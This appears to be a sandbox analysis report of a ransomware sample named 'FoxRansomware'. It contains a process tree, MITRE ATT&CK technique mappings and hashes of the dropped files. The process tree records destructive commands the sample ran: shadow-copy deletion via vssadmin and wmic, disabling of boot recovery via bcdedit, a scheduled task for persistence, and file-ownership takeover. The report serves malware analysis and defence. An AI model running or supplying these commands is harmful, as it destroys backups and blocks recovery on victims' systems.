  "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\oi0bl8T8.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1976
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\oi0bl8T8.bmp" /f
    3⤵
    - Sets desktop wallpaper using registry
    - System Location Discovery: System Language Discovery
    PID:3492
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4092
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5856
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\YEaFEkHR.vbs"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3480
- - C:\Windows\SysWOW64\wscript.exe
    wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\YEaFEkHR.vbs"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:5048
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\TEJwunt4.bat" /sc minute /mo 5 /RL HIGHEST /F
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:5620
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\TEJwunt4.bat" /sc minute /mo 5 /RL HIGHEST /F
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:8128
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:5852
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Run /I /tn DSHCA
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:6564
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Z3FqzaYw.bat" "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db""
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:5948
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db"
    3⤵
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:5928
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db" /E /G Admin:F /C
    3⤵
    - System Location Discovery: System Language Discovery
    PID:8076
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db"
    3⤵
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:7496
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c eF1cYkHq.exe -accepteula "SmsInterceptStore.db" -nobanner
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:5192
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\eF1cYkHq.exe
      eF1cYkHq.exe -accepteula "SmsInterceptStore.db" -nobanner
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:7952
    - - C:\Users\Admin\AppData\Local\Temp\eF1cYkHq64.exe
        
        eF1cYkHq.exe -accepteula "SmsInterceptStore.db" -nobanner
        5⤵
        Drops file in Drivers directory
        Sets service image path in registry
        Executes dropped EXE
        Enumerates connected drives
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: LoadsDriver
        Suspicious use of AdjustPrivilegeToken
        
        PID:5100

C:\Windows\SYSTEM32\cmd.exe
C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\TEJwunt4.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:5812
- C:\Windows\system32\vssadmin.exe
  vssadmin Delete Shadows /All /Quiet
  2⤵
  - Interacts with shadow copies
  PID:8388
- C:\Windows\System32\Wbem\WMIC.exe
  wmic SHADOWCOPY DELETE
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1600
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Exec Unrestricted try {start-process -FilePath "vssadmin" -ArgumentList "delete","shadows","/all","/quiet" -WindowStyle Hidden} catch {}
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:7164
- - C:\Windows\system32\vssadmin.exe
    "C:\Windows\system32\vssadmin.exe" delete shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:4956
- C:\Windows\system32\bcdedit.exe
  bcdedit /set {default} recoveryenabled No
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:7488
- C:\Windows\system32\bcdedit.exe
  bcdedit /set {default} bootstatuspolicy ignoreallfailures
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:8956
- C:\Windows\system32\schtasks.exe
  SCHTASKS /Delete /TN DSHCA /F
  2⤵
  PID:4060

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:7216

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Direct Volume Access

T1006

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\images\#CORE_README#.rtf

Filesize
8KB

MD5
43053cd44675d26d826ac241534c0f9e

SHA1
b9b6c6921af3b0eec40b0a536235df4e6e81641a

SHA256
f31ce7f98d4596516fca4c940ed7729d2d625e55f2783a454bf17b82b55ec87e

SHA512
4cf21c75273d3b56493e55248dbf16dfdcaa88163b083ed5daf96adfd70e8c19c09f8d27d1e5778f380db29920bb87fcb475bf39b6c40e93f2bb296cf6a159eb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
17KB

MD5
52cbe7169d0fb9c8423fcbafc8b8bc28

SHA1
33b23919c5352dd04e67862bff1ff8b3104a895c

SHA256
f75680ac12482b1cc91ae90b35e2c2efd4b484b8bd6c1749b88678b620df2dc2

SHA512
9cdeb9995133ec6b995c3190766a8dbf3dd7cb4ce38bfa34e0ad3cba8b0f90beb635934429b7e852f28f21fa09b6258c1738273f662856128fb7ce894e5f6ef6

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWmModN1.exe

Filesize
1.2MB

MD5
907636b28d162f7110b067a8178fa38c

SHA1
048ae4691fe267e7c8d9eda5361663593747142a

SHA256
6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b

SHA512
501a7ee7fc8c0869d3cb57be3a75be02f6a17583e524fae9fa29e149a7391a5ed79c45143c09c667eed7d2fe217503121e23edd6f1bac47c8ba7ec7a4ecbe04a

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OFi6rG8R.txt

Filesize
15B

MD5
494436e38cfbff698c30e72dd63813e1

SHA1
1ed10def48a1622c8a75e9e197d6c600d617cf98

SHA256
705d6eb22b78adf67cc9ac523602bbe8c5cdd363c6d187a374a9387a1b98d355

SHA512
9309bb0a409cb106f998aac62d084dee577252ec8ceeeff928a0a2b262c444824085d7ae64fd96dcdb180401d02c3e527de43cd7c80969ea8d84518a21b27c05

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Z3FqzaYw.bat

Filesize
246B

MD5
e169c68aa64141fe4dc72e4b12d0e103

SHA1
fb76278396b045fe2259cb093933bc2f6383a75c

SHA256
a9af293551668ad82101228b5ae0bab1fb194f47cbb7e91c4cc47d9021a809cc

SHA512
a3e470ad6350eebe4ca8891ea4ad27ebf116750c0c1e299743a0e42a82e3bc1570d129e2468a6e83955f744258a95f3894c67846b66f8bf933f05f8db22e9cf2

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\eF1cYkHq.exe

Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\elog_5ECC57EC62BCE8F5.txt

Filesize
12KB

MD5
a1c6d877e91e13d1e82075078a9d9b76

SHA1
97480300560619ac8a304403704f65852be6f490

SHA256
86cecc359be3cecc09f4ce1d32f27df029d7928d775cd882b50f03b9b2bacec6

SHA512
16e0304061734c4100ac7cf275138d57c8fed723b5ed1f8bf229511195d1afc85d35236789f64670ed188394b4f5a015b29e00e482663d74ff3b8864d5d91644

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zzvn5phn.bpw.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\eF1cYkHq64.exe

Filesize
221KB

MD5
3026bc2448763d5a9862d864b97288ff

SHA1
7d93a18713ece2e7b93e453739ffd7ad0c646e9e

SHA256
7adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec

SHA512
d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6

Download Submit
C:\Users\Admin\AppData\Roaming\TEJwunt4.bat

Filesize
415B

MD5
74263abd6dc7acd205aadd177aa20c48

SHA1
a4641bc8480867b3311d1e73a80b559a14774935

SHA256
0b658e79b8aea121610d4915cdfab357c29bff853b22c45a2f682538788070f1

SHA512
bcbb4bb38cf6e884516f789285786fcb9b5b6862a4e5788301bc7cae4ad2774649b4efaad34a538e8768fb7f7d68c58a7e8697c1512fa4f508231c59e6f545d6

Download Submit
C:\Users\Admin\AppData\Roaming\YEaFEkHR.vbs

Filesize
260B

MD5
f3816e91cf3d953ec92f334a40b8c56d

SHA1
692d898855ecf43a2f04214f0e8df23077b9d188

SHA256
9e76f7b9cb48f305f072c814fb8b24e40eafd5c68ba42dc801b48a2fb114e985

SHA512
0f169e33aecf5ec6346fbaaf5941168cd9cbea4ea05e681dc03a98175613f5c6a244f2bc30fb0d5c0ac1de4e7e9bc6c731e3b8ee8ebbb65345c10e3100fb3c56

Download Submit
memory/204-9027-0x0000000000400000-0x000000000053B000-memory.dmp

Filesize
1.2MB

Download
memory/204-15231-0x0000000000400000-0x000000000053B000-memory.dmp

Filesize
1.2MB

Download
memory/204-15245-0x0000000000400000-0x000000000053B000-memory.dmp

Filesize
1.2MB

Download
memory/2204-16-0x0000000007970000-0x00000000079BB000-memory.dmp

Filesize
300KB

Download
memory/2204-10-0x0000000006D20000-0x0000000007348000-memory.dmp

Filesize
6.2MB

Download
memory/2204-32-0x00000000094A0000-0x0000000009B18000-memory.dmp

Filesize
6.5MB

Download
memory/2204-9-0x00000000066B0000-0x00000000066E6000-memory.dmp

Filesize
216KB

Download
memory/2204-17-0x0000000007CB0000-0x0000000007D26000-memory.dmp

Filesize
472KB

Download
memory/2204-33-0x0000000008A40000-0x0000000008A5A000-memory.dmp

Filesize
104KB

Download
memory/2204-15-0x0000000007410000-0x000000000742C000-memory.dmp

Filesize
112KB

Download
memory/2204-14-0x0000000007620000-0x0000000007970000-memory.dmp

Filesize
3.3MB

Download
memory/2204-13-0x0000000006C90000-0x0000000006CF6000-memory.dmp

Filesize
408KB

Download
memory/2204-12-0x0000000006C20000-0x0000000006C86000-memory.dmp

Filesize
408KB

Download
memory/2204-11-0x0000000000EA0000-0x0000000000EC2000-memory.dmp

Filesize
136KB

Download
memory/4920-9035-0x0000000000400000-0x000000000053B000-memory.dmp

Filesize
1.2MB

Download
memory/4920-15247-0x0000000000400000-0x000000000053B000-memory.dmp

Filesize
1.2MB

Download
memory/4920-15274-0x0000000000400000-0x000000000053B000-memory.dmp

Filesize
1.2MB

Download
memory/7164-14170-0x0000024244680000-0x00000242446F6000-memory.dmp

Filesize
472KB

Download
memory/7164-13934-0x000002422BEC0000-0x000002422BEE2000-memory.dmp

Filesize
136KB

Download
memory/7952-10178-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/7952-15240-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download